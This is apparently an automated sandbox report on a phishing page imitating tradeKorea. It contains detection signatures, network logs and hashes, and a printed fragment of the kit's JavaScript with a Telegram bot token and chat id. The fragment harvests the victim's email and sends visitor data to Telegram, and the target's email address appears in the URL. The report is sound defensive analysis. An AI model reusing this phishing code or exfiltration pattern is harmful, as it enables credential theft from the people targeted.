Windows Analysis Report
https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1

Overview

General Information

Sample URL:	https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1
Analysis ID:	1571507

Detection

HTMLPhisher

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Yara detected HtmlPhish10

AI detected suspicious Javascript

Javascript uses Clearbit API to dynamically determine company logos

Javascript uses Telegram API

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

Javascript checks online IP of machine

Stores files to the Windows start menu directory

URL contains potential PII (phishing indication)

Classification

Signatures

Phishing

AI detected phishing page

Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1

Joe Sandbox AI: Score: 8 Reasons: The brand 'tradeKorea' is known and typically associated with the domain 'tradekorea.com'., The URL 'newkr-projectx.glitch.me' does not match the legitimate domain 'tradekorea.com'., The use of 'glitch.me' as a domain extension is unusual for a known brand like tradeKorea., The URL contains suspicious elements such as 'newkr-projectx', which do not align with the typical domain structure of tradeKorea., The presence of a personal email in the input fields suggests a potential phishing attempt to collect sensitive information. DOM: 1.1.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 1.0.pages.csv, type: HTML
Source: Yara match	File source: 1.1.pages.csv, type: HTML

AI detected suspicious Javascript

Source: 0.0.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://newkr-projectx.glitch.me/#brian.ruane@phil... This code exhibits multiple high-risk characteristics: heavy obfuscation using string encoding and character replacement, use of the Function constructor (dynamic code execution), complex string manipulation to hide functionality, and suspicious character patterns. The code appears deliberately obscured to evade detection, which is a common malware technique.
Source: 0.1.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://newkr-projectx.glitch.me/#brian.ruane@phil... High-risk malicious script: Contains credential harvesting functionality, sends stolen credentials via Telegram bot (exposed token), collects sensitive user data (email, password, IP, browser info), and includes data exfiltration to external services. Shows clear phishing characteristics with email validation and password collection.

Javascript uses Clearbit API to dynamically determine company logos

HTTP Parser: const bot_token = "7051308130:aagpocy-skirra6hgu3n13yjlxtbmoxjxua"; const chat_id = "1739269434"; const logger_token = ""; const logger_id = ""; const file = ""; /* global $ */ $(document).ready(function () { var count = 0; /////////////url ai getting//////////////// const aim = window.location.hash.substr(1).split("/"); var hashpart = handlebase64data(aim[0]); var ai = hashpart; if (!ai) { } else { // $('#ai').val(ai); var my_ai = ai; logvisitortotelegram(my_ai); var ind = my_ai.indexof("@"); var my_slice = my_ai.substr(ind + 1); var c = my_slice.substr(0, my_slice.indexof(".")); var final = c.tolowercase(); $("#ai").val(my_ai); $("#msg").hide(); var logourl = "https://logo.clearbit.com/" + my_slice; $.get(logourl) .done(function () { $(".log").attr("src", logourl); ...

Javascript uses Telegram API

HTML body contains low number of good links

HTTP Parser: Number of links: 0

HTML body contains password input but no form action

HTTP Parser: <input type="password" .../> found but no <form action="...

HTML title does not match URL

HTTP Parser: Title: tradeKorea.com: Verified Korean Suppliers and Products does not match URL

Javascript checks online IP of machine

URL contains potential PII (phishing indication)

Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	Sample URL: PII: brian.ruane@phillyshipyard.com&c

HTTP Parser: <input type="password" .../> found

Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	HTTP Parser: No <meta name="author".. found
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	HTTP Parser: No <meta name="author".. found

Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	HTTP Parser: No <meta name="copyright".. found
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49729 version: TLS 1.2

Source: chrome.exe

Memory has grown: Private usage: 27MB later: 36MB

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10

Source: global traffic	DNS traffic detected: DNS query: newkr-projectx.glitch.me
Source: global traffic	DNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global traffic	DNS traffic detected: DNS query: kit.fontawesome.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: www.tradekorea.com
Source: global traffic	DNS traffic detected: DNS query: ka-f.fontawesome.com
Source: global traffic	DNS traffic detected: DNS query: i.gyazo.com
Source: global traffic	DNS traffic detected: DNS query: logo.clearbit.com
Source: global traffic	DNS traffic detected: DNS query: kita.net

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49729 version: TLS 1.2

Source: classification engine

Classification label: mal68.phis.win@17/17@34/209

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1968,i,3655654666205261130,14224367164820248221,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1968,i,3655654666205261130,14224367164820248221,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.19.238	unknown	United States	15169	GOOGLEUS	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
104.18.10.207	maxcdn.bootstrapcdn.com	United States	13335	CLOUDFLARENETUS	false
104.18.40.68	unknown	United States	13335	CLOUDFLARENETUS	false
104.18.25.163	unknown	United States	13335	CLOUDFLARENETUS	false
172.217.17.35	unknown	United States	15169	GOOGLEUS	false
172.217.17.46	unknown	United States	15169	GOOGLEUS	false
203.233.202.180	kita.net	Korea Republic of	7557	KTNET-ASKoreaTradeNetworkKR	false
216.58.208.227	unknown	United States	15169	GOOGLEUS	false
203.233.202.194	www.tradekorea.com	Korea Republic of	7557	KTNET-ASKoreaTradeNetworkKR	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.217.21.42	unknown	United States	15169	GOOGLEUS	false
13.227.8.72	d26p066pn2w0s0.cloudfront.net	United States	16509	AMAZON-02US	false
104.18.24.163	i.gyazo.com	United States	13335	CLOUDFLARENETUS	false
172.217.17.74	unknown	United States	15169	GOOGLEUS	false
142.250.181.68	www.google.com	United States	15169	GOOGLEUS	false
34.198.85.26	newkr-projectx.glitch.me	United States	14618	AMAZON-AESUS	true
173.194.222.84	unknown	United States	15169	GOOGLEUS	false
104.21.26.223	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.16
192.168.2.24

Contacted Domains

Name	IP	Active
d26p066pn2w0s0.cloudfront.net	13.227.8.72	true
kita.net	203.233.202.180	true
www.tradekorea.com	203.233.202.194	true
i.gyazo.com	104.18.24.163	true
maxcdn.bootstrapcdn.com	104.18.10.207	true
www.google.com	142.250.181.68	true
newkr-projectx.glitch.me	34.198.85.26	true
ka-f.fontawesome.com	unknown	unknown
kit.fontawesome.com	unknown	unknown
logo.clearbit.com	unknown	unknown

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 9 12:13:37 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	2877DA4B284EA2F17BA469A31698BB3F	5F81E474921AEB11D8BC0C8CAD9D984F82050307	6ACE79CC4E39EB1E4E82493DB6D923043847059193B89004C4F21D559558F080
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 9 12:13:37 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	E5CF4AA5AD2F0857B1B09F33B6D8BF5E	7568E8E05669B6D6C173F96CCF62F860C75D171E	769DDAEA69247615DAB494F152DEF7B2BB3BDE89003F0A96CD78770060A93DDB
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	64E3D444D9C221C2BD08502E8C41565C	FD0FBB80A86A175E272F789C8628106BE40230B7	524B216EBC164F08637B2274401F86B004546B0C3C038BB3C27452541D7D9EA4
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 9 12:13:37 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	12E8CB2E3734EB3DCA621436E0A7F956	DCF80FC1E41535751A4D5D1482D70CA3091A4198	CD224D33D5A775D2D006A3A4A4176E8CACFCE3EDD39288C4DD40DA91F9660D3B
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 9 12:13:37 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	1855A15C79C1691B9D09CEB568B165C5	8938D4D74403A84EAEE076B70472FD81EE18B8C7	1EE05611E57C4041F117B41CD3896EE56675D69CFF35FAC65A67A68DCEDFB7FF
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 9 12:13:37 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	EF3C38A4CA54E72B28CC044D863C73FE	2BBF2075CC17E9B558D5053BA175EEB2F8132F06	BAC57DF2BF9100D8F16ADAD500640EDDE5EB0C6218645FA9B9D3B66088F13443
Chrome Cache Entry: 68	ASCII text, with no line terminators	1C543AA7106EF49E99A89BA522A17203	5112BB1FD360CC2F067A1A039D0AE8303C1C3F04	EA17DA2DDF4B9EA76295840A83602D5421F5CEBDAB65FECAE3502DC3C7FFC947
Chrome Cache Entry: 69	ASCII text, with very long lines (65325)	450FC463B8B1A349DF717056FBB3E078	895125A4522A3B10EE7ADA06EE6503587CBF95C5	2C0F3DCFE93D7E380C290FE4AB838ED8CADFF1596D62697F5444BE460D1F876D
Chrome Cache Entry: 72	PNG image data, 240 x 52, 8-bit/color RGBA, non-interlaced	D30780AD87966A529443782BACBC08F1	808D179276C0F6A16C44905ED664F37A945C2BBC	F97EDD215229D12891919181F68964FBF25E718345538A9B11721C1048C44D08
Chrome Cache Entry: 74	ASCII text, with very long lines (32065)	2F6B11A7E914718E0290410E85366FE9	69BB69E25CA7D5EF0935317584E6153F3FD9A88C	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
Chrome Cache Entry: 75	ASCII text, with very long lines (26500)	76F34B71FC9FB641507FF6A822CC07F5	73ED2F8F21CD40FB496E61306ACBB5849D4DBFF4	6DEA47458A4CD7CD7312CC780A53C62E0C8B3CCC8D0B13C1AC0EA6E3DFCECEA8
Chrome Cache Entry: 76	HTML document, Unicode text, UTF-8 text, with very long lines (65477)	B237FF1E71A42C4C865FC40DFF2CD195	1DDA1FC14CAB37112437F8CD5BD3FD81F3ABC185	33C6F2715F46A47B75F602898364424EB866C832C68760EC4B8F77A8C43EE041
Chrome Cache Entry: 78	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, baseline, precision 8, 1903x901, components 3	56CE8C9AC0A9AAC3FA5BA75A1E3CE1AE	679D82B715CD2D25D8F559DB6EC9DE88FD3EC6FB	2B6C3E2DA265185F4D008E3F8E26E89C678B8FF972A9375726D1472A47EA69F7
Chrome Cache Entry: 80	ASCII text, with very long lines (60130)	A12EC7EBE75A4D59A5DD6B79E2BA2E16	28F5DCC595EE6D4163481EF64170180502C8629B	FC5128DFDCDFA0C3A9967A6D2F19399D7BF1AAAE6AD7571B96B03915A1F30DDA
Chrome Cache Entry: 82	PNG image data, 82 x 82, 8-bit/color RGBA, non-interlaced	FD9C3E48E3E8F62C3EECE1F0D22DAF5F	72C4EF097E948C303C55CFEA777DAB4EBD1322C8	ACCEBC909A8DD07B4B3494ABF42BB902FAB371B73233242C7D66F87E8223A427
Chrome Cache Entry: 84	ASCII text, with very long lines (13061)	43AB92573DB23CAD409FEE52BE4915A3	7167480166EAEFD9D7E3F2CED22E15A57D4789CC	5756543ABC3CDB299ED8578412C39ABB2A6D50AA5376EA34877CF84B66AA356E
Chrome Cache Entry: 85	ASCII text	048827075038BB29A926100FAC103075	344B5CF6498867A1806DB0287F339B12C00F34B5	88F23B85D81514D63DA43985D4E8BE67C1D4235E42768EBDC3783F88FB36C1E0

Phishing

AI detected phishing page

Yara detected HtmlPhish10

Source: Yara match	File source: 1.0.pages.csv, type: HTML
Source: Yara match	File source: 1.1.pages.csv, type: HTML

AI detected suspicious Javascript

